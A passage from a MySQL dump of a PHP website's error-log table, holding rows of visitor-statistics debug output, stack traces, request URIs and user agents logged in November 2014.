SYSTEM\\SAI\\saimod_sys_log::sai_mod__SYSTEM_SAI_saimod_sys_log_action_stats_name_basic_visitor(\'3600\', \'2013.12.db\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.240', 0.016, '2014-11-28 15:26:32', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=stats&name=basic_visitor&filter=3600&db=2013.12.db', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (377, 'SYSTEM\\LOG\\ERROR', 'Array\n(\n [0] => Array\n (\n [day] => 2013-12-26 01:00:00\n [count] => 6\n [user_unique] => 2\n [ip_unique] => 1\n )\n\n [1] => Array\n (\n [day] => 2013-12-25 01:00:00\n [count] => 5\n [user_unique] => 1\n [ip_unique] => 1\n )\n\n)\n', '659ad5e06cb09042ca160ee68c15f2fa5e8e35b4', 1, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_log/saimod_sys_log.php', 66, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_log::sai_mod__SYSTEM_SAI_saimod_sys_log_action_stats_name_basic_visitor(\'86400\', \'2013.12.db\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.240', 0.016, '2014-11-28 15:27:18', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=stats&name=basic_visitor&filter=86400&db=2013.12.db', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (378, 'SYSTEM\\LOG\\ERROR', 'Array\n(\n [0] => Array\n (\n [day] => 2013-12-26 19:00:00\n [count] => 6\n [user_unique] => 2\n [ip_unique] => 1\n )\n\n [1] => Array\n (\n [day] => 2013-12-25 19:00:00\n [count] => 5\n [user_unique] => 1\n [ip_unique] => 1\n )\n\n)\n', '0e7df100dc73706d6b1ab9368b2e483b25451f15', 1, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_log/saimod_sys_log.php', 66, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_log::sai_mod__SYSTEM_SAI_saimod_sys_log_action_stats_name_basic_visitor(\'21600\', \'2013.12.db\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.240', 0.016, '2014-11-28 15:26:45', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=stats&name=basic_visitor&filter=21600&db=2013.12.db', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (379, 'SYSTEM\\LOG\\ERROR', 'Array\n(\n [0] => Array\n (\n [day] => 2014-01-20 01:00:00\n [count] => 1\n [user_unique] => 1\n [ip_unique] => 1\n )\n\n [1] => Array\n (\n [day] => 2014-01-14 19:00:00\n [count] => 2\n [user_unique] => 1\n [ip_unique] => 1\n )\n\n [2] => Array\n (\n [day] => 2014-01-02 13:00:00\n [count] => 3\n [user_unique] => 1\n [ip_unique] => 1\n )\n\n)\n', 'a4fd3d00b4e066487c661b21ab10828cfa266bbf', 1, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_log/saimod_sys_log.php', 66, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_log::sai_mod__SYSTEM_SAI_saimod_sys_log_action_stats_name_basic_visitor(\'21600\', \'2014.1.db\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.240', 0.032, '2014-11-28 15:26:55', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=stats&name=basic_visitor&filter=21600&db=2014.1.db', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (380, 'SYSTEM\\LOG\\ERROR', 'Array\n(\n [0] => Array\n (\n [day] => 2014-01-10 01:00:00\n [count] => 3\n [user_unique] => 2\n [ip_unique] => 2\n )\n\n [1] => Array\n (\n [day] => 2013-12-11 01:00:00\n [count] => 3\n [user_unique] => 1\n [ip_unique] => 1\n )\n\n)\n', 'def271d5ae349a4d8347cd71a2f7da746f5a157d', 1, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_log/saimod_sys_log.php', 66, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_log::sai_mod__SYSTEM_SAI_saimod_sys_log_action_stats_name_basic_visitor(\'2592000\', \'2014.1.db\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.240', 0.016, '2014-11-28 15:26:59', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=stats&name=basic_visitor&filter=2592000&db=2014.1.db', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (381, 'SYSTEM\\LOG\\ERROR', 'Array\n(\n [0] => Array\n (\n [day] => 2014-01-20 01:00:00\n [count] => 1\n [user_unique] => 1\n [ip_unique] => 1\n )\n\n [1] => Array\n (\n [day] => 2014-01-14 01:00:00\n [count] => 2\n [user_unique] => 1\n [ip_unique] => 1\n )\n\n [2] => Array\n (\n [day] => 2014-01-02 01:00:00\n [count] => 3\n [user_unique] => 1\n [ip_unique] => 1\n )\n\n)\n', '3f27bb1ef8aa9e6ed210a88dba0b6ab6ff1a77ca', 1, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_log/saimod_sys_log.php', 66, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_log::sai_mod__SYSTEM_SAI_saimod_sys_log_action_stats_name_basic_visitor(\'86400\', \'2014.1.db\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.240', 0.016, '2014-11-28 15:27:57', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=stats&name=basic_visitor&filter=86400&db=2014.1.db', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (382, 'SYSTEM\\LOG\\ERROR', 'Array\n(\n [0] => Array\n (\n [day] => 2014-10-31 01:00:00\n [count] => 13871\n [user_unique] => 2\n [ip_unique] => 85\n )\n\n [1] => Array\n (\n [day] => 2014-10-30 01:00:00\n [count] => 560\n [user_unique] => 1\n [ip_unique] => 105\n )\n\n [2] => Array\n (\n [day] => 2014-10-29 01:00:00\n [count] => 287\n [user_unique] => 1\n [ip_unique] => 93\n )\n\n [3] => Array\n (\n [day] => 2014-10-28 01:00:00\n [count] => 284\n [user_unique] => 2\n [ip_unique] => 101\n )\n\n [4] => Array\n (\n [day] => 2014-10-27 01:00:00\n [count] => 2436\n [user_unique] => 3\n [ip_unique] => 82\n )\n\n [5] => Array\n (\n [day] => 2014-10-26 02:00:00\n [count] => 1800\n [user_unique] => 2\n [ip_unique] => 83\n )\n\n [6] => Array\n (\n [day] => 2014-10-25 02:00:00\n [count] => 210\n [user_unique] => 1\n [ip_unique] => 88\n )\n\n [7] => Array\n (\n [day] => 2014-10-24 02:00:00\n [count] => 175\n [user_unique] => 2\n [ip_unique] => 94\n )\n\n [8] => Array\n (\n [day] => 2014-10-23 02:00:00\n [count] => 213\n [user_unique] => 1\n [ip_unique] => 91\n )\n\n [9] => Array\n (\n [day] => 2014-10-22 02:00:00\n [count] => 292\n [user_unique] => 1\n [ip_unique] => 111\n )\n\n [10] => Array\n (\n [day] => 2014-10-21 02:00:00\n [count] => 962\n [user_unique] => 1\n [ip_unique] => 99\n )\n\n [11] => Array\n (\n [day] => 2014-10-20 02:00:00\n [count] => 229\n [user_unique] => 1\n [ip_unique] => 99\n )\n\n [12] => Array\n (\n [day] => 2014-10-19 02:00:00\n [count] => 272\n [user_unique] => 3\n [ip_unique] => 103\n )\n\n [13] => Array\n (\n [day] => 2014-10-18 02:00:00\n [count] => 1002\n [user_unique] => 2\n [ip_unique] => 108\n )\n\n [14] => Array\n (\n [day] => 2014-10-17 02:00:00\n [count] => 166\n [user_unique] => 1\n [ip_unique] => 96\n )\n\n [15] => Array\n (\n [day] => 2014-10-16 02:00:00\n [count] => 149\n [user_unique] => 1\n [ip_unique] => 98\n )\n\n [16] => Array\n (\n [day] => 2014-10-15 02:00:00\n [count] => 193\n [user_unique] => 1\n [ip_unique] => 102\n )\n\n [17] => Array\n (\n [day] => 2014-10-14 02:00:00\n [count] => 343\n [user_unique] => 1\n [ip_unique] => 94\n )\n\n [18] => Array\n (\n [day] => 2014-10-13 02:00:00\n [count] => 371\n [user_unique] => 1\n [ip_unique] => 101\n )\n\n [19] => Array\n (\n [day] => 2014-10-12 02:00:00\n [count] => 93\n [user_unique] => 1\n [ip_unique] => 57\n )\n\n [20] => Array\n (\n [day] => 2014-10-11 02:00:00\n [count] => 127\n [user_unique] => 1\n [ip_unique] => 75\n )\n\n [21] => Array\n (\n [day] => 2014-10-10 02:00:00\n [count] => 137\n [user_unique] => 1\n [ip_unique] => 80\n )\n\n [22] => Array\n (\n [day] => 2014-10-09 02:00:00\n [count] => 121\n [user_unique] => 1\n [ip_unique] => 84\n )\n\n [23] => Array\n (\n [day] => 2014-10-08 02:00:00\n [count] => 202\n [user_unique] => 1\n [ip_unique] => 104\n )\n\n [24] => Array\n (\n [day] => 2014-10-07 02:00:00\n [count] => 766\n [user_unique] => 1\n [ip_unique] => 100\n )\n\n [25] => Array\n (\n [day] => 2014-10-06 02:00:00\n [count] => 415\n [user_unique] => 1\n [ip_unique] => 91\n )\n\n [26] => Array\n (\n [day] => 2014-10-05 02:00:00\n [count] => 162\n [user_unique] => 1\n [ip_unique] => 88\n )\n\n [27] => Array\n (\n [day] => 2014-10-04 02:00:00\n [count] => 219\n [user_unique] => 1\n [ip_unique] => 102\n )\n\n [28] => Array\n (\n [day] => 2014-10-03 02:00:00\n [count] => 191\n [user_unique] => 1\n [ip_unique] => 95\n )\n\n [29] => Array\n (\n [day] => 2014-10-02 02:00:00\n [count] => 146\n [user_unique] => 1\n [ip_unique] => 95\n )\n\n)\n', 'fc508d5532aee9fe54e6d92faa9eca90c0f2e64b', 1, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_log/saimod_sys_log.php', 66, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_log::sai_mod__SYSTEM_SAI_saimod_sys_log_action_stats_name_basic_visitor(\'86400\', \'2014.10.db\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.240', 0.66002, '2014-11-28 15:28:30', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=stats&name=basic_visitor&filter=86400&db=2014.10.db', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (383, 'SYSTEM\\LOG\\ERROR', 'Array\n(\n [0] => Array\n (\n [day] => 2014-03-29 01:00:00\n [count] => 5\n [user_unique] => 1\n [ip_unique] => 1\n )\n\n [1] => Array\n (\n [day] => 2014-03-28 01:00:00\n [count] => 12\n [user_unique] => 2\n [ip_unique] => 2\n )\n\n [2] => Array\n (\n [day] => 2014-03-27 01:00:00\n [count] => 1\n [user_unique] => 1\n [ip_unique] => 1\n )\n\n [3] => Array\n (\n [day] => 2014-03-21 01:00:00\n [count] => 1\n [user_unique] => 1\n [ip_unique] => 1\n )\n\n [4] => Array\n (\n [day] => 2014-03-19 01:00:00\n [count] => 161\n [user_unique] => 2\n [ip_unique] => 2\n )\n\n [5] => Array\n (\n [day] => 2014-03-18 01:00:00\n [count] => 184\n [user_unique] => 2\n [ip_unique] => 1\n )\n\n [6] => Array\n (\n [day] => 2014-03-17 01:00:00\n [count] => 19\n [user_unique] => 2\n [ip_unique] => 3\n )\n\n [7] => Array\n (\n [day] => 2014-03-16 01:00:00\n [count] => 6\n [user_unique] => 1\n [ip_unique] => 1\n )\n\n [8] => Array\n (\n [day] => 2014-03-15 01:00:00\n [count] => 4\n [user_unique] => 1\n [ip_unique] => 1\n )\n\n [9] => Array\n (\n [day] => 2014-03-13 01:00:00\n [count] => 6\n [user_unique] => 1\n [ip_unique] => 1\n )\n\n)\n', '84c92ac64d5f76fd85c4a3b0ab8880a9ef85c8fe', 1, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_log/saimod_sys_log.php', 66, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_log::sai_mod__SYSTEM_SAI_saimod_sys_log_action_stats_name_basic_visitor(\'86400\', \'2014.3.db\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.240', 0.1, '2014-11-28 15:28:02', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=stats&name=basic_visitor&filter=86400&db=2014.3.db', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (384, 'SYSTEM\\LOG\\ERROR', 'Array\n(\n [0] => Array\n (\n [day] => 2014-04-30 02:00:00\n [count] => 2\n [user_unique] => 1\n [ip_unique] => 1\n )\n\n [1] => Array\n (\n [day] => 2014-04-18 02:00:00\n [count] => 5\n [user_unique] => 1\n [ip_unique] => 1\n )\n\n [2] => Array\n (\n [day] => 2014-04-12 02:00:00\n [count] => 2\n [user_unique] => 1\n [ip_unique] => 1\n )\n\n [3] => Array\n (\n [day] => 2014-04-09 02:00:00\n [count] => 2\n [user_unique] => 1\n [ip_unique] => 1\n )\n\n [4] => Array\n (\n [day] => 2014-04-06 02:00:00\n [count] => 2\n [user_unique] => 1\n [ip_unique] => 1\n )\n\n [5] => Array\n (\n [day] => 2014-04-04 02:00:00\n [count] => 13\n [user_unique] => 1\n [ip_unique] => 1\n )\n\n)\n', '5b7d468ef6cb1fd50387779c36140062308c182c', 1, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_log/saimod_sys_log.php', 66, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_log::sai_mod__SYSTEM_SAI_saimod_sys_log_action_stats_name_basic_visitor(\'86400\', \'2014.4.db\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.240', 0.028, '2014-11-28 15:28:07', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=stats&name=basic_visitor&filter=86400&db=2014.4.db', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (385, 'SYSTEM\\LOG\\ERROR', 'Array\n(\n [0] => Array\n (\n [day] => 2014-05-29 02:00:00\n [count] => 1\n [user_unique] => 1\n [ip_unique] => 1\n )\n\n [1] => Array\n (\n [day] => 2014-05-28 02:00:00\n [count] => 2\n [user_unique] => 1\n [ip_unique] => 1\n )\n\n [2] => Array\n (\n [day] => 2014-05-16 02:00:00\n [count] => 1\n [user_unique] => 1\n [ip_unique] => 1\n )\n\n [3] => Array\n (\n [day] => 2014-05-02 02:00:00\n [count] => 4\n [user_unique] => 1\n [ip_unique] => 2\n )\n\n)\n', '58715672a65f540224634f699957ccfc2586bacb', 1, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_log/saimod_sys_log.php', 66, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_log::sai_mod__SYSTEM_SAI_saimod_sys_log_action_stats_name_basic_visitor(\'86400\', \'2014.5.db\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.240', 0.024, '2014-11-28 15:28:10', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=stats&name=basic_visitor&filter=86400&db=2014.5.db', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (386, 'SYSTEM\\LOG\\ERROR', 'Array\n(\n [0] => Array\n (\n [day] => 2014-06-30 02:00:00\n [count] => 439\n [user_unique] => 1\n [ip_unique] => 90\n )\n\n [1] => Array\n (\n [day] => 2014-06-29 02:00:00\n [count] => 216\n [user_unique] => 1\n [ip_unique] => 84\n )\n\n [2] => Array\n (\n [day] => 2014-06-28 02:00:00\n [count] => 669\n [user_unique] => 1\n [ip_unique] => 93\n )\n\n [3] => Array\n (\n [day] => 2014-06-27 02:00:00\n [count] => 2418\n [user_unique] => 2\n [ip_unique] => 91\n )\n\n [4] => Array\n (\n [day] => 2014-06-26 02:00:00\n [count] => 13961\n [user_unique] => 2\n [ip_unique] => 98\n )\n\n [5] => Array\n (\n [day] => 2014-06-25 02:00:00\n [count] => 9995\n [user_unique] => 3\n [ip_unique] => 90\n )\n\n [6] => Array\n (\n [day] => 2014-06-24 02:00:00\n [count] => 3447\n [user_unique] => 4\n [ip_unique] => 109\n )\n\n [7] => Array\n (\n [day] => 2014-06-23 02:00:00\n [count] => 22206\n [user_unique] => 2\n [ip_unique] => 88\n )\n\n [8] => Array\n (\n [day] => 2014-06-22 02:00:00\n [count] => 3492\n [user_unique] => 2\n [ip_unique] => 101\n )\n\n [9] => Array\n (\n [day] => 2014-06-21 02:00:00\n [count] => 1992\n [user_unique] => 3\n [ip_unique] => 89\n )\n\n [10] => Array\n (\n [day] => 2014-06-20 02:00:00\n [count] => 4256\n [user_unique] => 4\n [ip_unique] => 99\n )\n\n [11] => Array\n (\n [day] => 2014-06-19 02:00:00\n [count] => 289\n [user_unique] => 1\n [ip_unique] => 87\n )\n\n [12] => Array\n (\n [day] => 2014-06-18 02:00:00\n [count] => 391\n [user_unique] => 1\n [ip_unique] => 101\n )\n\n [13] => Array\n (\n [day] => 2014-06-17 02:00:00\n [count] => 293\n [user_unique] => 1\n [ip_unique] => 84\n )\n\n [14] => Array\n (\n [day] => 2014-06-16 02:00:00\n [count] => 235\n [user_unique] => 1\n [ip_unique] => 87\n )\n\n [15] => Array\n (\n [day] => 2014-06-15 02:00:00\n [count] => 2421\n [user_unique] => 2\n [ip_unique] => 16\n )\n\n [16] => Array\n (\n [day] => 2014-06-14 02:00:00\n [count] => 97\n [user_unique] => 2\n [ip_unique] => 1\n )\n\n [17] => Array\n (\n [day] => 2014-06-13 02:00:00\n [count] => 308\n [user_unique] => 2\n [ip_unique] => 3\n )\n\n [18] => Array\n (\n [day] => 2014-06-12 02:00:00\n [count] => 206\n [user_unique] => 2\n [ip_unique] => 1\n )\n\n)\n', '77c505517711aa1ad705bd4a1fb1bca966efea12', 1, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_log/saimod_sys_log.php', 66, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_log::sai_mod__SYSTEM_SAI_saimod_sys_log_action_stats_name_basic_visitor(\'86400\', \'2014.6.db\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.240', 1.87606, '2014-11-28 15:28:22', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=stats&name=basic_visitor&filter=86400&db=2014.6.db', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (387, 'SYSTEM\\LOG\\ERROR', 'Array\n(\n [0] => Array\n (\n [day] => 2014-07-31 02:00:00\n [count] => 257\n [user_unique] => 1\n [ip_unique] => 96\n )\n\n [1] => Array\n (\n [day] => 2014-07-30 02:00:00\n [count] => 275\n [user_unique] => 1\n [ip_unique] => 86\n )\n\n [2] => Array\n (\n [day] => 2014-07-29 02:00:00\n [count] => 241\n [user_unique] => 1\n [ip_unique] => 87\n )\n\n [3] => Array\n (\n [day] => 2014-07-28 02:00:00\n [count] => 170\n [user_unique] => 1\n [ip_unique] => 90\n )\n\n [4] => Array\n (\n [day] => 2014-07-27 02:00:00\n [count] => 128\n [user_unique] => 1\n [ip_unique] => 79\n )\n\n [5] => Array\n (\n [day] => 2014-07-26 02:00:00\n [count] => 183\n [user_unique] => 1\n [ip_unique] => 91\n )\n\n [6] => Array\n (\n [day] => 2014-07-25 02:00:00\n [count] => 137\n [user_unique] => 1\n [ip_unique] => 79\n )\n\n [7] => Array\n (\n [day] => 2014-07-24 02:00:00\n [count] => 185\n [user_unique] => 1\n [ip_unique] => 86\n )\n\n [8] => Array\n (\n [day] => 2014-07-23 02:00:00\n [count] => 311\n [user_unique] => 1\n [ip_unique] => 88\n )\n\n [9] => Array\n (\n [day] => 2014-07-22 02:00:00\n [count] => 336\n [user_unique] => 1\n [ip_unique] => 92\n )\n\n [10] => Array\n (\n [day] => 2014-07-21 02:00:00\n [count] => 179\n [user_unique] => 1\n [ip_unique] => 96\n )\n\n [11] => Array\n (\n [day] => 2014-07-20 02:00:00\n [count] => 156\n 